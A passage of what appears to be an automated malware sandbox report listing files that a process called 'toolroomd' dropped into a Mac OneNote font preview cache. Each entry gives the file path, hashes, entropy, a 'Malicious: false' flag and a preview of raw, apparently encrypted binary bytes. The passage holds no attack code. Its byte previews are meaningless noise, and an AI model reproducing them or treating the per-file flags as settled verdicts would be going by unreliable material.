Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..Z..=..Q...I...........(.t.[.....U....O......=..W.....,7:.......P.(^....M..6.....7...<...o....I..\|.+g.?%o.?LY....5np=....!.\|.6..<.M..E..<....Yb__N..cA.h.KJ..>.........".8>......^..3.l..H.}4........_<T.....?UcC..j.....YH..Y..x..)l~'..f."8l@.t~.t...3K7......u.#..p3....Q..........}......W..........5s.&..p..E..S.@_-..-mi...x.5.]fu`.E\......./....w...+.J.Wy.hW....6..-.=.....;..j.L"...v..`.n.{y..K=..B.}.......!.`...8Q5Z.`........%....:...8q."..z.y,Ji..f^)..F....}.eG$..N...0....J.....C.Y.;......M}...~0L...s.\[.......^f.0..e.y..M+........0@u,].L[.._rMm.h..k.p.>..{..<....$)[.......@T.c.Rx..o......iN..Bh._U...........r....,.l.).{T..bM.(q...^ ..d...B.J...lF....,...r[>....J0n5#.Ly.S....U..u.XJR.`....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Sinhala MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1058
Entropy (8bit):	7.2358335497902475
Encrypted:	false
SSDEEP:	24:ESJdfRhC+nr036/VrmgRYUm18dVTr0oPkjyUVZsePc0m7:EUlr9rmWm18EZ3Npq
MD5:	E953FFDF903519A39517A820A37CE703
SHA1:	C99C20B094B0D1E70A9299108FA2ACFA6345851A
SHA-256:	7723B97CDF596E42F14D6B9773D659D9430B046559278546D14D4171E215C261
SHA-512:	871CDCFE25856501835298295AA920D61DB794959B2B01DF75B5FF46BA5301C6C106074F615B015FE8994F62663D00578D334B8D71C7717F0E3FC2D0B5273F57
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...H....B..\|....}U07...\|.....u.~$u.Bc^#..E..1V.......x....k......t...5]ia......Z.f..f......A......J.;7...k.....U......J.;7...0.VcA.2......X..H.....i......)vH....~....~=...o..6r#...4.h..m...b..h.?L.U.[V.[R.qNg</\4..-nu..QPR.FZ....)A...[..gO........@..?..itD.}......~.......W;..p)GS.#.'.Ck#J..s....jo..G{.... ...n..ov...1._.N.L..y,..+.~}r^.LSM.B..]&.![`.Z_os4..R...#g..4.dB4..$i.$p..=DU...><t.0.p.: ..<..7?X..LU.E.....v!...ndr.....4....3.>C.R.UQ.t....d.W..C.............(..@o......=.a]..hH...^........$6.#....4.r..:..tJ.!%..#WGK.3.#."(Z..%bq...A..Y.-B....5Z....U.J.$.TMb.P.Hp]w....u.]o.+..>......g..e...4<d....b...q..,...r[>K .H}wg.?......q..Q...`N....U..u.eL.$(.....................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Sinhala Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1554
Entropy (8bit):	7.501609055291804
Encrypted:	false
SSDEEP:	24:9AE0bnDRYLocfq/3eDTwqqdhyRPa2CjRupIJoFX3Pk3TDKjUaP8sePc0m7:9cTtJcyWrmhqPaHjRrit3Pk3TupP8Npq
MD5:	FF429F34140ED4397067336FEBEA553F
SHA1:	7A1F6128CA7C790C26B101AC950082C2DDF9183B
SHA-256:	DC5A6FA1C4A8E583C1D0354B4AA71F21742580C02D5152AF95FCBD8791C8BE53
SHA-512:	42CF21E0E49FE6CBB3708D9518F0DF089AE30B7B8170278898943D3D80D75BF3A9C703526B25245BE81D957C6230C40CE318ED0D7EE8F11147D5CE1F59AE3C8E
Malicious:	false
Preview:	.<.\|.....f.A..}.r<.9.%...D.fu.;..bcZ..i .Y.a-sE.<.p.tZEn...@...4OR..xm..........5.....R...>....T\..OG4.Kj,D1K6lp_...wD.&.....5......GC.gx.B.>Dk.......I.u...Z.X.7....#...R'R...X...P.D...-p.&..M&'...1.j.?.g:.A..r.Q.WC.&...w0..a....&...nc.`.O.k...e.w......ih..5.u. c.&<..n....Io....J.S!........9j.`...l.e..Q...2.D.sU...........^.A].'x%w...9R.`...c#]..miG.._..WU6;.P3.Rw.h...,..0.y..T.. ....(.p.v...h........P..4.<b....[.3.].C....QK.<..q......}.N'.......%...s.z....j.. ..y!.j[.U96.D%.."..Q..m.i....<h@..z=...+...[...C.x.)ID...Pu...K..a...5j..h.....x......9.Fy4.\|....... .............kA..Uo.;....H4.@....]2.^.........Rs.u......:I\./..B.a.C..f.!k.tb...n>..k..l#.-...m..\..+..Q^>7W....\.4.\|....-*i.zu.l.7S..B.^.~..#....X....-.1w^.f...@.......d.I.n.8k...Pa....u.>Oz.2.3._K..{....uk.$...\.fA:......i...JR'.8w........v....n......g.........@.}<%...cC.......'..~>o%.o..L..>...\|r...=..J...0'm1>..h_..f.,.....O.Fn..H..XA....Ql.WDt......}u..8Aur..3

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.SkiaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1002
Entropy (8bit):	7.174351056764482
Encrypted:	false
SSDEEP:	24:EfKp0eBRhon+0r5Po/VbdTNJAc0sePc0m7:EfKpZSn+0r5Po/VzJAbNpq
MD5:	A136C91362AC1E41BFF6DC3BD2ADEFCA
SHA1:	4BB191465A77C48FE1E8B2F143A9B00BBBB61D61
SHA-256:	AE097F49029BD3BE06C5542D71BB8FBC3C20A1DFDEC1869CD356FA51CEB9849B
SHA-512:	BABE392609F6B3F749E593AF2A153A9FA77A2E685B4F9CA7A38FE281292A6666FC0E918ED7D1948CC9093243FA6AFFCFD26C9928B07101740169F68A0F0F8B98
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.am1.T.)=2....Rmo......]..'7.>..?..a.....W.L...U.8D.U.....Q.s.....;.,..........7..!..7.,.7.L".G..7T.?%o.?LY..IW11P.. ...zP.....C...'...Bo.e..dd...gF..<.-m.lK.5o..DZ...-......wx.\...HV.^zz1.. E..uh..................H....E.2...Fy.=,.<........8eh.l~..tt.t..j.!Z..8m.?.d...W..=`@.,.'A./.z.0.............2...Y..zw...L..a4...+....?Z....$.!9..?.0....~..o.+dM...a:...i....1S..J.e.. .]...`...1...V.>EK.6.5.\|.....y..DO...-{....YC...s/......Q.j....:,....g..q...B.........o...U....&.c@^v.x^HG.Irq.Zt.PA. .....y....L...45..=...D~.:;.G..R.W6;..@........T.lC./.....<3dV........3.?%o.?LYx..w.+?..U...o........y.Ap...r.}...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Snell RoundhandRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1578
Entropy (8bit):	7.537351509772407
Encrypted:	false
SSDEEP:	24:EMSE0Sm3lXY6wXNKYvzdmfPbJhxM2+cH6W1n4hH6nmQJwQsysePc0m7:EMSb3lXVYKYvzcfjJ02+cHX1wCJxNpq
MD5:	1CF909544F8A913552C044F19AA046C8
SHA1:	714FA50960585002DB8B28C80E3D47B62F186107
SHA-256:	FA5417E31AD1F32FA450E0F8DA22AA64815EE3F2AEE0FAA919E3A6E055103B22
SHA-512:	9ECBB8F7C7CB8656B6100A5C0445C1ABF66A090BEDEF8E85267081030A313E7956436307BCA2E48020067AFAF91F84077DBE9694C9D2343E9ABA08248FCE4981
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a3C}.w..z........~&`\.n...{...GX....Dh.a.$....5.+....N...+.wp4T.g.^..Y~....8...l_.FWv......-....r....\|..+.B..a.,W..t..@.._.@.zY.....ox.b..J....t..5EM4........I..q...7..-NsM.....i(C..g.8.Xc..f.&2........n..b..H........}.!W...nR..AR..e..}E.z.o...B./Z.N2....u..I.'V.h.r.^.........DH?..e.z.NET.i~..a..D"`..B.^...&...B.G.:...=..l%..B....ur.h.D.P8........c6ba.q[..k.n....t....H.?.....V4.ySI`.m.Xm.r.0.c.$....gQ...0.V.alY.(....Bhy>......V.v..S @!..\|,..W....M....Ui.p8...9<..X\..F..y..>b6..!....Z.n....wE6+.S.M\|..>q...[..c.<........G.(..A?1,......x....9.4.."S.......G.6~.v..$j.....s(].....;.>..U...>."x4...{.....3.8.....e...f.Imc..Cj.....o+.O..~.;b..\|...C.J.f...\.....[.gn.Y.@...#VL...K.@.,.f.......1.a...L.)....k&.A.h..?>vs..?..;A..S..Ru.......U....[...@..:.......bkN)*..=.>2".-f.W.=%..{..B..H.KMN..G;Gx2.....v.+.lU.O.n....b~g3....7.Y.0.vk2Kvy...Dy..aA...9..WX.....k..z....:.<.^.......e.p0b@..V.....F

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Songti SCRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1338
Entropy (8bit):	7.404578539446866
Encrypted:	false
SSDEEP:	24:EnbU5MqaybopOnCCaOYnaTxH1DBC8vwG4gH+8fnGNgQSWFuevf6sePc0m7:Eg5MqaaoIM3nabDRoMNfnGNgQdFT6Npq
MD5:	E60828CEED1E881BEFAF22D19CBEE67E
SHA1:	3509D645F465DC15FEACC8AC7075366361EA3C4D
SHA-256:	CD3AF22725D226729A3A7D0A126982DE176194754853D7A500F16C0C08F2D13C
SHA-512:	6403E35DE679228ACF31AEC13AD44F0AF25B27B4C7779F23C440D851040AD80AC43D3E15109808C7E861D5174F95DF5AD4159F59AB869389CD06A31BB3203D3C
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.au.8..F..,.r.'w.#.[IG...x.i.......{?.;6........7...............x.4..G....-.....M.\|.r.rFR..O..Z..q....H...........%.E........^`[.j.T\|?......>.q7...~[X....L...J..o.`..#Jw?.:~.8q`.J..e.~..0.)oN....85gX...."~.No[.=l?.E.6..}q.v5.....;e..%....0...I...X.]1..1.....XX........pr....`..H...D.....j.....Smb./.O}.M.n..=.J....^l.W.r...)..S61..%X?.........K......dq.n.d...@....^H.......A..A.x...<~..+..}.......V5w..\..c.o...D...xL.P.f!....u..hy...KI...@.w..0....4.....q$.S..bfw,.GC..O.O...c.,..v.y...R..WBP.........]]d..O;Bv+.fk.-.A..u...../..-....A.-.+....RM....-...o{.z...K.....%.-..m."K...f..<..b.P'..C........^..a...]&vi4W...v..&.#...L`..D.>...j9....[...8..X....7.......+Q..._{.aM55..+..s&o%..?..d.k.y9..D:R=.^..X...]+t...H......b..........`.I.S.%..5...H....K...L...O$..=..V..~.h..q..(.\...h.B?..q9....b9J>...B....i(A...&.....i.N...k.v.[.~......*?.......e.<..6.[.vQ C..a..<G<y...{q?<..XQ.r...[.....+-...%.E.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Songti TCRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	7.415931827273786
Encrypted:	false
SSDEEP:	24:EZQPIXmLOPKDfVijO0RltwKE8pCyX038zt/oNN3e8aesePc0m7:E+IXID9ufnwKZUst/4NOcNpq
MD5:	BD40BE4CF169F474DAB4D0AE0E15D71B
SHA1:	D6DC0421ECBB3E72D051EA7CB36ACA0AFDE42952
SHA-256:	84E1F3BBB095B25EAB96F9998B2C7855A99C4E98E7954218C21B921522288943
SHA-512:	03B46587357FD7EBA712A7FF47BC04840C2D55D794F3D379BCDE8EC0435255A92529085E6B4EC9AB41892B93F3B90BB30822703EE06467B06850201EA310B436
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a2..Gj.wm..pv0....5.........y.....[Vk-..NpE.....}CY.:...1...R5....j......hWl...S...\.......c.......yj/.R...Uv........6t.#.K.[.........:}.z..+..og......(.Ld..^..u.n.'..8.1.....!.\|.-.S.........1..#.g.m{...4"...*J.A8. '.(.P..I... ....l.U.....!4....XQb.vc..\|#..<..)..C..V{g..."[..1.LQ..s..B^.....Ef.'.Wc......u..D.r..._"..9^...fQ..Y...k.l...i.KL.'sF.Hu....o...9/;4..N..."..'...q$5.Z..+.B.7...........S...xp"]v.0..Yup.l.\..rF.8k..:;.....X8\g........(/....c..".\|zA.=.].?.?^H..M...V.^...Ub...$.e...e.Z..6...\|K.ko.._$....p....v......`........q..... 44O...M.E...#..,H.iM..5.J.N......../A..<...3.C..7.....2....]...n...,.aG......-;4..u....X...Z(.}...L;..T......)..#:+..HFLSa._...$d^.C.I).Tv....j..OD.r....9.1Q...u\.CBx,F....Z.$..A....Q~...p.......3.H.qGK[l...~#.p..1.XJ.h ...6..4...L...n..,....4P...ki.%.........8..a.F.3..J.mz....W6.L.V..z.m...X[...M.$d....W..g7..]z.........iG..$-St..I...[..2.r.Gl.au!

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Sukhumvit Set TextRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1890
Entropy (8bit):	7.619647448638265
Encrypted:	false
SSDEEP:	48:EgzdT+/JKwjwgkbrNUARhZslN+BqqNzdnNpq:jKJKwjZur+ALZ2UB3Vu
MD5:	7D65198F754E53E031FC5348F57048B9
SHA1:	0160790713F8BFE14B08F7120DFB0D87F789BFAA
SHA-256:	3DD6B49527AA791FCFEDEAD6BACDF1CC54940B280AC01BB8B9EAEA5A38BFB04E
SHA-512:	5545DAEEBFB62080C0710628B61ADC417243884A0EFB6F3121FD87C2272D99CC65C5B26451970E3EE6E1AD8500115BE0487C6B072613027ADDBD3115CD344512
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a,....[.....Bd.............Zq?..3Z..].....#.Bh........V.I\a_...!u..4X..F$kg.F.&..-..5...;..c.ac...73n%.. .i.H.:..i.H.:..pX..(.........B.'......y.Q....E..a.3.V..l`..m..a7................>..J.7D.....D..4...B.'[Z..:..#A.E..R.g"d.p .s.....Q....2.`..r....uGRa..u.U.........l.......M`..F..Uy/x../.6F.....a....S&32....a.........T$\.w.#.tE......g..$.Y\|.@=.Y.O.....0(._s..\|.C..<.Y.L...`b{......C.M.....pEp.....6Jg._.i..F..T..e.S...X&;Z.1.!.0...`j.Z^..x.n..c.`.c,....p.".....M..mj..?..Ik.E..<y..8\h...6I..#.....p.&_.\_.......8..\|.%A..S.......+Y.J...}3d......c.`......uC.-.X.......1.v..N".Q..l...H.B.,....I....A..-...R;..3.cR.8).......%....?Y.4..M..4B......1h..!..~.P.L.N...{...~.....0....&.u............H.M.....:.j.........rHgI.......[[v.`..z(.z..M..!x.X...:...14Z..A2.f....S{.".5^....]..z9'.:p....$E..Nt....?...G...@.F,iM.4\|pu.L7<...Dz=p....#.C.Q... ........U..........}.!#..@.?Q....%.l........

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Sukhumvit SetMedium.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1610
Entropy (8bit):	7.543744979460795
Encrypted:	false
SSDEEP:	48:E//IbQ2Gh3aldzMI6BdqQGPzyKTOv/uJkl60Npq:wqQ2wavz/VPGV/uU60u
MD5:	F07B0F30965BB03703919860B9D44905
SHA1:	4296E56C7E192891919B71A34CFD2FF535A292DA
SHA-256:	AAA70EEA7030B850BE8752C3141C1B8579A26EE877BDB3E380AF4C862D3B1855
SHA-512:	0210CB5B3C351FD126A4523AC8BC8031CE237C9D1BEB38C622ED680084C9B25641B7EADA609CA513F46033EA4D866606BCFA7AA1762560BF993F7463F2A8D3EC
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a8n.!.....%.WS.V...1..@...zu.....C..`...G.......~.......L.$.x....N...A+>u...d..S.9...@.3..Mh.)@....X.....H.K/..X.7....#...R'R.0U.I.:.....\|@..7..n6..tB..Qp.......].R..Q.6.).G@QG...q....u.t..V.Ne6a..T..[B....u.<~5.f.Hk....Y.U(.\...'.b......23.zEf.....3s%.}Y./...Q.K.d......`..7..[..}.....7.....]..O...r.5.j....&Q......GN.,....L..=....fA.(.........l...b>..M...}.....$.k.....mt(.V.Q.3...K.X({O.....c..l6......v.s...C0<w.......2........!V.r...l.o.%.[...tm...w.s....u...0]....,,a....4U...!.VHa.9.;.TFgi.....hg.e.q6.....0$%..,.sAve-.`U.b..)o!..P.'b..z\|.i......_q...x.T-.#N....j-Ek...m."C.l.)g.C.......~.L]..n0.!. ...m.s...].X.z.W!.....h...W..Y..qI.t9.uc..Y...h.<.r.Q.....:.....W.x..2...%.....\|.c.....X.......B....$%;..4.h.._.....OC[....A._F.......`..`7.<..FR..Nx.!/.U...o{.Q)H.M......S..{..&M4;...\...2...0.P...8.t.....e}.N..I+M.\Q."...e#S...\|u.S.nB..S ....Y......2W.....i....!H..S.%.W....J2c...P.....Pf".

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.SuperclarendonRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2090
Entropy (8bit):	7.696166552869731
Encrypted:	false
SSDEEP:	24:Eexsuxwcokrf3YOXEtKBOEATArw+ZmNXJhDuqhfkjNgXH2RrnPvFGon6JJeY+8sF:EexycokLNxOEAa1ZKhDhyNgXwYXeQNpq
MD5:	1152028AB3DB3D32C240BD2DCDFD211A
SHA1:	68AB7BDC6168D97AB65282EECE9BB0704E57C2F4
SHA-256:	A9CB0BABB802AC91053FB11002A135688E33EA5CA65C50DDABBEE7EBFE728299
SHA-512:	1BC5FDBC89AABC50AE7C24A62AC9F0E682FD66375F11853C2C217D5C53D250E29F766BE85DA584E19B41E0EE4FB86E08D5E6C7252E99116AB1396CE093CEBF11
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.^.E.K..M.#.m.w..]............=.gM.v.h.....R..5.[.?.............A... ....t..as ...>..w@Z1.iE..$6..>y.6.@[Yb..{.[Yb..{.Z.sP&PpK....#...<..Ijid.y5Q...k...<_.J..g.h_..X....@.....j..(o).. -.^z+....%.i..#..d.........^......3C...63....5..8..a.-.aR'S+......iV.Nn.......y..N.m+.~.\_....Ci..?.}...7...H%,..'....\|..:5...8....k_..&.._.i.G..\X.j.,k..q..4.p.q.`....D..k.9.b.0...y.....=U.....~....g....$.5.m....9q.d.H...]..;....r.d..o.....l.U...{...C..S...&...&S....H...^8wQnM....R..M....RQ.(.l(.q.$Tb.T.K........t.k.vX..j.*..h...Y.;Ar......X.X...~..^d.Q_.=u....2."..:........+.....\|g...S./:..\|..V...Xr..'...Z+.7@.h.g.P)..{..4=A..`...>.~..".K......O... >i....U.F...!...O.DK..Zy..U'..4B..... 5.....J....l...(e.#.I...9j$.....m.....U........v.kiM.Xi.B.M]N.Saw..1.#.v<z..Y)._l16.P.kB.(w.......B.....A."&.....;.>.w.9...t.6.<.UO...5.$....\.P..s.L.)JN..VA>j[.g$8..s[..f....B.n+.'V...EW.$9 g.W.M-\|...F...[./...+.+&L%.0.......

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.SymbolRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1250
Entropy (8bit):	7.365932278234722
Encrypted:	false
SSDEEP:	24:E71OV4geV8XBU3JFBk+MJMQpu51E2MU1QgY+h5gsePc0m7:ExEJeyhJVu51ELbgngNpq
MD5:	E7614AF6FEEDA620F934DD8C47D7E963
SHA1:	375E866FE6FB60DB4D521C605A4B9047427E7CE0
SHA-256:	593537F65ED4B9EEE00FB92EBEFA092AD0424DB7EADA7232FBA48D0ABEE12585
SHA-512:	D45DC5126A244E4F342B9509021755135609951E492D7C9804F32D745C5279DE76C753080FB6EFD4A017CF10461F1B148A31F83091E4712F1602D6C932BD2E76
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.M.7....dF.....^..p.....Q...}W6'P.h..8.o.2.^........d.XKY.P..../~.Y...'.q9."r....C....Q.s....I.!i{..%..U.....Mi.[...x..,.&.K..`jq.[.E.h.\|6..o.~..f...ib[..'S.P.[..].v...C.^.j-.........&K.5.&.J&s..'...@....GK....5....%z;..&..jM..$...Q...2..r.Gs}s...PP..vk.,..^c..w..A........w..FX..\|b...1.f.x......\k.n.....F.^..d.F..Az2..l 5..c.`...ZK.B...a..;.......e.....AQ.#.{.1:...F....q"....$.5.8.~...,.9p.T.....N....w..}M..W..jN.^..U.b.....!d...V...i&...gZw.....PBv/>d..$.0..p..Y...#.NX.T.....+..A..wn....6....."..,....{b/r.O....pU...=..l.p$;x..E..u(G.....jP..6-pq..T/..........P?.@.sL..o~....~.8q...[...&<...s.....q..:.b.Q]. ...H.1....33K.>.Q,.tUO..#....S...Gs.<9@.T....L...n8.0.qZ!<...J..B.Z9.'+.A.../...._.^d..c.l.\|..bg.+p..S.D....A<.J...y.....o..g..[O...X.zf...+z.....[d...OZ .!\|.k<.Rn...f.UI.hW-..d?.1.e......B.ku..n..S...iu.,..R.........i.M..+.X`[.$.Kg4..k...................\.........^./k..`R..V5..jd..ysVT9.X

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.TH SarabunPSKRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1674
Entropy (8bit):	7.576058284997464
Encrypted:	false
SSDEEP:	48:EgvgmaqIjCtB2MpfoAig1WLOniOZ0lJNpq:bvgK32EfoAig1gOniOKlJu
MD5:	AA14F60939EEC87AC96FF082023D4FAF
SHA1:	A49276995F4FEE79954F9431717285F7E3842BA3
SHA-256:	F8AE6F68D209814B993306998C03E40F97667596FB212A78E6F8555ADA61080D
SHA-512:	4684BBE4820AC988214C928D9D6693CA9E84C5BCF6B667585B331E719DBB88D878ED752F5D0D3935DA33FB2B596ACBDC1F423EF478EBCBE383339A1CE407CD8A
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.9.&m.....Ms.H..K.9.../...\5..M.{...&Z2...Q..-..%/!..r4.M.+5.ae8.'.Q......$.uN.Q..K.c.......}Q.J'..R....)QUB...'.&WR...J.f1!.a6.~....\|g#.>7.`>..z.kU..!O5.s.C......}r.k...?.X.f..;..}.............M63.....{.1.Pkk.l...@.9..%W.........(..(.\|..l.B...@UWIG..PF.7...d..i..... .k....B.d+9...?...M1.GW..=}..W.q....o.....\|.1.m.......6..jz..)[.g..9[.....X~..c.<....lf<....[c.2....H..7^s.T.A.X..[a.@i.=.KfS/..E".. .%.G.K&...SW.#....+,n.z.......0.B9)..SzWb#Z.!\6E[/.Aq..U..-D......]...,.Z.......B.s.>.t.._....1....&.\...N&..4...+.....x.#....A..& ...O......F..l..p..........t.N...\|y...:.WV....Yk&.F....W}%....3.'$$.\|.u..-K7'..U\|.@.#,.Jt.6J...8....A.b3?,.8......[..m...U*o....m.\|...U..j..M..a..yX..J...3.Bq6..-....sv.(.J...L.....m.(WM.-e-......._B...Y...Z...N....}...).a..Z ...]....S......~........[....S%@s.%..X...~~..kT...x.t..C.5.9hb.T....p.g<.%......KY.X.p.r..13lB.....{.&1..xSM#).z.3....7..\|'Y...3b..V...^>n.Jx.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.TahomaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1138
Entropy (8bit):	7.27101366941446
Encrypted:	false
SSDEEP:	24:E+1/MINCIL5XXOl5ONYXlZaRzn+2HOSsePc0m7:E+ppOqYXWRn+ZSNpq
MD5:	B4DB693D80FF1A7BE52719F7C156B26F
SHA1:	380ADF0122BAE6EC5E19D07817BBD60FDCDEF1D5
SHA-256:	ED5893961210A7D18A5A9A391888A9ADF0849701F66D492CB038FE1BD4007CE2
SHA-512:	F58B925160AA55AB121E5D7B9276AECCB38FE4DE0A8B963E3F21C1FFED2BD80326490521E2DFBE86C3FA7C8F560A1C16E6A8F9D45A971B9B65A4BCFB2B5830A1
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a\m.....B..\|...H...Y....i._.....O...j.I.<M."suy..h.9.E.].....Z..8.C).'....unr\_.b.i..y<.!.!..~.E\.....Quw..f..yH....!.f.q.~.........B.X>.....NE..".>.......n.\.;'.........9T..j..y.q!f.......4.a.q..mV..&......U....,..3.Gn.\|h.X#.$.J....hx."a...Wll.l.......n...b..b..`..&i4..9t.&(..'.h}j...O..GP..D........7:z..yt...[.;....]...Z........[5.Z.'...f.5.5.z..p^.=C8..0SG}#t..[W..$......L/t$.<IA.+S.[u.Bs.E..I.,b._...s~>:3..T.=.rl..e.6D\.N{.....=..x..S.'[...E.g.U..K{..]..}...A.Q.....$.....U...C.C......Q.....b.4P2L.%Bn...c...l.:T...}.q......@k...{..b.j...iB.....=.\F,...L<..7.'.O.Q...=...E<m...VNviG....a..9....~.....;.....0.K.<.....t..V..c\...H..Ne..b\..?U.P.}..h...........Y.`..+...c? >D.9_.0....r...^S..F.Y'za.(V.............;....y...Q%..x..S.A.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Tamil MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	7.169515344770806
Encrypted:	false
SSDEEP:	24:EhEwtnJD7gMzBDFG79yJeluX8HifD5RsePc0m7:E28VgMzyBao1Hi/Npq
MD5:	1D8B1368F4BC45A54C435C28194D51A8
SHA1:	D83C5297E7BDCFEEEC697A1992EEDDEC138142B8
SHA-256:	9B03A05A5C89FE1C7F9D53123FFA3C2259A1403ACFEAE4143E76F0F081AB9CE2
SHA-512:	6F0DAE06FFA96E3E5BD92472619A017C790F76CCB845CDA7D00D0E7075A2085EE0AC5D2F50DFDA88ACB083F256CECA60BE950017429442A0971D7ECFBED78AAE
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.afz..Fh......z..-+.b}^..mz......K..=.>.. .Eh.j\.1;.d.F.-_.c....p....e...D.\|....#9[.... .......\|.S.......~#2R-.-5"s..}m....._..{A.._.!....6...dF..LG/...~uqi1.o.......X.&...Sun.%....".&u....z!h.kT....a.T.s... .1] .r.. ..#.....0....{...JS.......b.].X..k...!.+.>.._.f;....-......i.....iJ..H.,e.....O.6+...K._.1...V...."..f}..@]......Y....F..........E.'.......{...G].X.&TC}x...~......{$....Nkg{...[.Tn .4..<..@ I..R..RT.ne........ihJ..K.Yz.^0..&....\|.-..,e.x.)5d.\|..0....;.`..U".@..07..q..bbxqR...L.k..3...Rxm..G..Y..N...K~................Q^.g.S,.,d..XF.h......LaSQ.....".S..a... ..'W\...D%.8OKe....^T{.~4.J.;7...7@{...Jm.. ..#..0.$j=%..j..S.......................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Tamil Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1794
Entropy (8bit):	7.592290883777719
Encrypted:	false
SSDEEP:	24:E0jgA4JNEeTZ6uet4I185crKEceEQDiTgLSuvdQNjd+vEtLQDK9zB0hsePc0m7:E0YJpAtJ85IKEcg2kpFQNjfLisaNpq
MD5:	8A09D2AD9A46F9C5515D888FF6B63AEE
SHA1:	C77357A64FA68D9373F98248FC96EAFF0E54D9B0
SHA-256:	E95A04850A32388D6AD8193DA45DF50AC7C8FF4454639C5F3EE6085B8875A767
SHA-512:	DAAA77B2D5EF3274EF804B2E7119461AA36BBD442C9C049E08C7453A885AF953113D25965C48D3B4864E939C7C5339A2133F8EDAA205683602BE0697D596A28D
Malicious:	false
